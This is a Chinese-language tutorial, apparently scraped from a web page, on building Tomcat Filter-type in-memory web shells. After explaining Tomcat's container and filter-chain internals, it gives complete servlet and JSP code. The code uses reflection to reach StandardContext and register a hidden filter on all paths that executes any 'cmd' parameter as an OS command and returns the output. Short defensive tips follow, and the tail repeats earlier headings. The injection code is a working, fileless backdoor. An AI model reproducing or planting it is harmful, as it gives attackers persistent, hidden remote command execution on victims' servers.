Tomcat Filter型内存马原理与实现详解<\/h1>

一、Tomcat架构概述<\/h2>
要理解Tomcat内存马的实现，必须首先了解Tomcat的整体结构与请求处理机制。<\/p>

Tomcat顶层结构<\/h3>

Server组件<\/strong>：代表Tomcat运行的实例，一个JVM中只包含一个Server<\/li>

Service组件<\/strong>：一个Server下可包含多个Service，每个Service包含：

多个Connector（接收消息）<\/li>
一个Engine（处理请求）<\/li> <\/ul> <\/li>
Connector<\/strong>：负责接收客户端请求

HTTP Connector：默认8080端口，处理HTTP请求<\/li>
AJP Connector：默认8009端口，处理其他WebServer的代理请求<\/li> <\/ul> <\/li>
Engine<\/strong>：处理接收的请求，可配置多个虚拟主机(Host)<\/li>
Host<\/strong>：虚拟主机，代表一个域名<\/li>
Context<\/strong>：对应一个Web应用，包含多个Servlet<\/li> <\/ol>
请求处理流程<\/h3>

请求到达Tomcat，Service交给Connector处理<\/li>
Connector将请求封装为Request和Response对象<\/li>
封装后的请求交给Container处理<\/li>
Container处理完成后返回给Connector<\/li>
Connector通过Socket将结果返回客户端<\/li> <\/ol>
Container处理细节<\/h3>
Container内部包含4个子容器，处理流程为：<\/p>

Connector调用最顶层容器(Engine)的Pipeline处理<\/li>
Engine管道依次执行EngineValve1、EngineValve2等，最后执行StandardEngineValve<\/li>
StandardEngineValve调用Host管道，依次执行HostValve1、HostValve2等，最后执行StandardHostValve<\/li>
依次调用Context管道和Wrapper管道，最后执行StandardWrapperValve<\/li>
StandardWrapperValve创建FilterChain并调用其doFilter方法处理请求<\/li> <\/ol>
二、Filter机制分析<\/h2>
Filter基本概念<\/h3>
Filter是Servlet规范中的过滤器，可以在请求到达Servlet前进行预处理。多个Filter可以组成Filter链，按配置顺序依次执行。<\/p>
Filter执行流程<\/h3>

请求到达StandardWrapperValve<\/li>
创建ApplicationFilterChain<\/li>
调用ApplicationFilterChain的doFilter方法

doFilter调用internalDoFilter<\/li>
internalDoFilter获取并执行配置的Filter<\/li> <\/ul> <\/li>
所有Filter执行完毕后，请求到达Servlet<\/li> <\/ol>
FilterChain创建过程<\/h3>

StandardWrapperValve.createFilterChain()方法：

获取StandardContext对象<\/li>
通过findFilterMaps获取所有Filter映射<\/li>
匹配URL映射关系<\/li>
将匹配的Filter信息存入filterConfig<\/li>
通过filterChain.addFilter(filterConfig)添加到FilterChain<\/li> <\/ul> <\/li> <\/ol>
三、Filter内存马实现原理<\/h2>
要实现Filter内存马，需要：<\/p>

获取当前应用的StandardContext对象<\/li>
获取filterConfigs映射表<\/li>
实现自定义的恶意Filter对象<\/li>
创建FilterDef对象并配置<\/li>
创建FilterMap对象并设置拦截路径<\/li>
将FilterDef、FilterMap和FilterConfig添加到相应容器<\/li> <\/ol>
关键步骤详解<\/h3>

获取StandardContext<\/strong>：<\/p>

通过ServletContext → ApplicationContext → StandardContext链式获取<\/li>
需要反射突破访问限制<\/li> <\/ul> <\/li>

创建恶意Filter<\/strong>：<\/p>

实现Filter接口<\/li>
在doFilter方法中植入恶意代码（如命令执行）<\/li> <\/ul> <\/li>

配置FilterDef<\/strong>：<\/p>

设置Filter实例、名称和类名<\/li>
通过StandardContext.addFilterDef()添加<\/li> <\/ul> <\/li>

配置FilterMap<\/strong>：<\/p>

设置URL匹配模式("\/*"匹配所有路径)<\/li>
设置Filter名称<\/li>
设置DispatcherType<\/li>
通过StandardContext.addFilterMapBefore()添加<\/li> <\/ul> <\/li>

创建FilterConfig<\/strong>：<\/p>

反射创建ApplicationFilterConfig实例<\/li>
将配置添加到filterConfigs映射表<\/li> <\/ul> <\/li> <\/ol>
四、完整实现代码<\/h2>
Servlet实现方式<\/h3>
public<\/span> class<\/span> AddTomcatFilter<\/span> extends<\/span> HttpServlet {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> protected<\/span> void<\/span> doPost<\/span>(<\/span>HttpServletRequest req,<\/span> HttpServletResponse resp)<\/span> throws<\/span> ServletException,<\/span> IOException {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> String name =<\/span> "cmdFilter"<\/span>;<\/span> <\/span><\/span> \/\/ 获取ServletContext <\/span><\/span><\/span><\/span> ServletContext servletContext =<\/span> req.<\/span>getSession<\/span>().<\/span>getServletContext<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取ApplicationContext <\/span><\/span><\/span><\/span> Field appctx =<\/span> servletContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span> <\/span><\/span> appctx.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> ApplicationContext applicationContext =<\/span> (<\/span>ApplicationContext)<\/span> appctx.<\/span>get<\/span>(<\/span>servletContext);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取StandardContext <\/span><\/span><\/span><\/span> Field stdctx =<\/span> applicationContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"context"<\/span>);<\/span> <\/span><\/span> stdctx.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> StandardContext standardContext =<\/span> (<\/span>StandardContext)<\/span> stdctx.<\/span>get<\/span>(<\/span>applicationContext);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取filterConfigs <\/span><\/span><\/span><\/span> Field Configs =<\/span> standardContext.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"filterConfigs"<\/span>);<\/span> <\/span><\/span> Configs.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Map filterConfigs =<\/span> (<\/span>Map)<\/span> Configs.<\/span>get<\/span>(<\/span>standardContext);<\/span> <\/span><\/span> <\/span><\/span> if<\/span> (<\/span>filterConfigs.<\/span>get<\/span>(<\/span>name)<\/span> ==<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> \/\/ 创建恶意Filter <\/span><\/span><\/span><\/span> Filter filter =<\/span> new<\/span> Filter()<\/span> {<\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> doFilter<\/span>(<\/span>ServletRequest servletRequest,<\/span> ServletResponse servletResponse,<\/span> FilterChain filterChain)<\/span> throws<\/span> IOException,<\/span> ServletException {<\/span> <\/span><\/span> HttpServletRequest req =<\/span> (<\/span>HttpServletRequest)<\/span> servletRequest;<\/span> <\/span><\/span> if<\/span> (<\/span>req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>)<\/span> !=<\/span> null<\/span>)<\/span> {<\/span> <\/span><\/span> \/\/ 命令执行逻辑 <\/span><\/span><\/span><\/span> String cmd =<\/span> req.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span> <\/span><\/span> String[]<\/span> commands =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toUpperCase<\/span>().<\/span>contains<\/span>(<\/span>"WIN"<\/span>)<\/span> <\/span><\/span> ?<\/span> new<\/span> String[]{<\/span>"cmd"<\/span>,<\/span> "\/c"<\/span>,<\/span> cmd}<\/span> <\/span><\/span> :<\/span> new<\/span> String[]{<\/span>"\/bin\/sh"<\/span>,<\/span> "-c"<\/span>,<\/span> cmd};<\/span> <\/span><\/span> <\/span><\/span> String charset =<\/span> System.<\/span>getProperty<\/span>(<\/span>"os.name"<\/span>).<\/span>toLowerCase<\/span>().<\/span>contains<\/span>(<\/span>"window"<\/span>)<\/span> ?<\/span> "GBK"<\/span> :<\/span> "UTF-8"<\/span>;<\/span> <\/span><\/span> Scanner scanner =<\/span> new<\/span> Scanner(<\/span>Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>commands).<\/span>getInputStream<\/span>(),<\/span> charset).<\/span>useDelimiter<\/span>(<\/span>"\\A"<\/span>);<\/span> <\/span><\/span> String output =<\/span> scanner.<\/span>hasNext<\/span>()<\/span> ?<\/span> scanner.<\/span>next<\/span>()<\/span> :<\/span> ""<\/span>;<\/span> <\/span><\/span> <\/span><\/span> servletResponse.<\/span>getWriter<\/span>().<\/span>println<\/span>(<\/span>output);<\/span> <\/span><\/span> return<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> filterChain.<\/span>doFilter<\/span>(<\/span>servletRequest,<\/span> servletResponse);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ 其他Filter方法... <\/span><\/span><\/span><\/span> };<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建并配置FilterDef <\/span><\/span><\/span><\/span> FilterDef filterDef =<\/span> new<\/span> FilterDef();<\/span> <\/span><\/span> filterDef.<\/span>setFilter<\/span>(<\/span>filter);<\/span> <\/span><\/span> filterDef.<\/span>setFilterName<\/span>(<\/span>name);<\/span> <\/span><\/span> filterDef.<\/span>setFilterClass<\/span>(<\/span>filter.<\/span>getClass<\/span>().<\/span>getName<\/span>());<\/span> <\/span><\/span> standardContext.<\/span>addFilterDef<\/span>(<\/span>filterDef);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建并配置FilterMap <\/span><\/span><\/span><\/span> FilterMap filterMap =<\/span> new<\/span> FilterMap();<\/span> <\/span><\/span> filterMap.<\/span>addURLPattern<\/span>(<\/span>"\/*"<\/span>);<\/span> <\/span><\/span> filterMap.<\/span>setFilterName<\/span>(<\/span>name);<\/span> <\/span><\/span> filterMap.<\/span>setDispatcher<\/span>(<\/span>DispatcherType.<\/span>REQUEST<\/span>.<\/span>name<\/span>());<\/span> <\/span><\/span> standardContext.<\/span>addFilterMapBefore<\/span>(<\/span>filterMap);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 创建FilterConfig并注册 <\/span><\/span><\/span><\/span> Constructor constructor =<\/span> ApplicationFilterConfig.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>(<\/span>Context.<\/span>class<\/span>,<\/span> FilterDef.<\/span>class<\/span>);<\/span> <\/span><\/span> constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> ApplicationFilterConfig filterConfig =<\/span> (<\/span>ApplicationFilterConfig)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>standardContext,<\/span> filterDef);<\/span> <\/span><\/span> filterConfigs.<\/span>put<\/span>(<\/span>name,<\/span> filterConfig);<\/span> <\/span><\/span> <\/span><\/span> resp.<\/span>getWriter<\/span>().<\/span>print<\/span>(<\/span>"Inject Success !"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span> <\/span><\/span> e.<\/span>printStackTrace<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>JSP实现方式<\/h3> <%@ page import="org.apache.catalina.core.*, java.lang.reflect.*, org.apache.tomcat.util.descriptor.web.*, java.util.*, java.io.*" %> <% final String name = "evil"; \/\/ 获取StandardContext ServletContext servletContext = request.getSession().getServletContext(); Field appctx = servletContext.getClass().getDeclaredField("context"); appctx.setAccessible(true); ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); Field stdctx = applicationContext.getClass().getDeclaredField("context"); stdctx.setAccessible(true); StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); \/\/ 获取filterConfigs Field Configs = standardContext.getClass().getDeclaredField("filterConfigs"); Configs.setAccessible(true); Map filterConfigs = (Map) Configs.get(standardContext); if (filterConfigs.get(name) == null) { \/\/ 创建恶意Filter Filter filter = new Filter() { public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain) throws IOException, ServletException { String cmd; if ((cmd = req.getParameter("cmd")) != null) { \/\/ 命令执行逻辑 Process p = Runtime.getRuntime().exec(cmd); BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream())); StringBuilder sb = new StringBuilder(); String line; while ((line = br.readLine()) != null) { sb.append(line).append("\n"); } res.getWriter().write(sb.toString()); return; } chain.doFilter(req, res); } \/\/ 其他Filter方法... }; \/\/ 配置FilterDef FilterDef filterDef = new FilterDef(); filterDef.setFilter(filter); filterDef.setFilterName(name); filterDef.setFilterClass(filter.getClass().getName()); standardContext.addFilterDef(filterDef); \/\/ 配置FilterMap FilterMap filterMap = new FilterMap(); filterMap.addURLPattern("\/*"); filterMap.setFilterName(name); filterMap.setDispatcher(DispatcherType.REQUEST.name()); standardContext.addFilterMapBefore(filterMap); \/\/ 创建并注册FilterConfig Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class); constructor.setAccessible(true); ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef); filterConfigs.put(name, filterConfig); out.println("Injected Successfully!"); } %> <\/code><\/pre> 五、防御措施<\/h2> 代码层面<\/strong>：<\/p> 避免使用反射修改Tomcat内部对象<\/li> 对Filter的添加进行权限控制<\/li> <\/ul> <\/li> 检测层面<\/strong>：<\/p> 监控web.xml之外的Filter添加<\/li> 检查StandardContext中的filterConfigs<\/li> 检测异常的Filter类<\/li> <\/ul> <\/li> 运行时防护<\/strong>：<\/p> 使用安全管理器限制反射<\/li> 部署RASP解决方案<\/li> <\/ul> <\/li> 运维层面<\/strong>：<\/p> 定期检查Tomcat内存中的Filter列表<\/li> 监控不寻常的URL访问模式<\/li> <\/ul> <\/li> <\/ol> 六、总结<\/h2> Tomcat Filter内存马通过动态添加恶意Filter实现持久化控制，具有以下特点：<\/p> 无文件落地，直接驻留内存<\/li> 高隐蔽性，不修改web.xml<\/li> 通过标准Filter机制实现，兼容性好<\/li> 拦截所有请求，控制力强<\/li> <\/ol> 理解其原理有助于安全人员更好地防御此类攻击，同时也提醒开发者Filter机制的安全重要性。<\/p>

Tomcat Filter型内存马原理与实现详解<\/h1>

一、Tomcat架构概述<\/h2> 要理解Tomcat内存马的实现，必须首先了解Tomcat的整体结构与请求处理机制。<\/p>

二、Filter机制分析<\/h2>

Filter基本概念<\/h3> Filter是Servlet规范中的过滤器，可以在请求到达Servlet前进行预处理。多个Filter可以组成Filter链，按配置顺序依次执行。<\/p>

四、完整实现代码<\/h2>

一、Tomcat架构概述<\/h2>
要理解Tomcat内存马的实现，必须首先了解Tomcat的整体结构与请求处理机制。<\/p>

Filter基本概念<\/h3>
Filter是Servlet规范中的过滤器，可以在请求到达Servlet前进行预处理。多个Filter可以组成Filter链，按配置顺序依次执行。<\/p>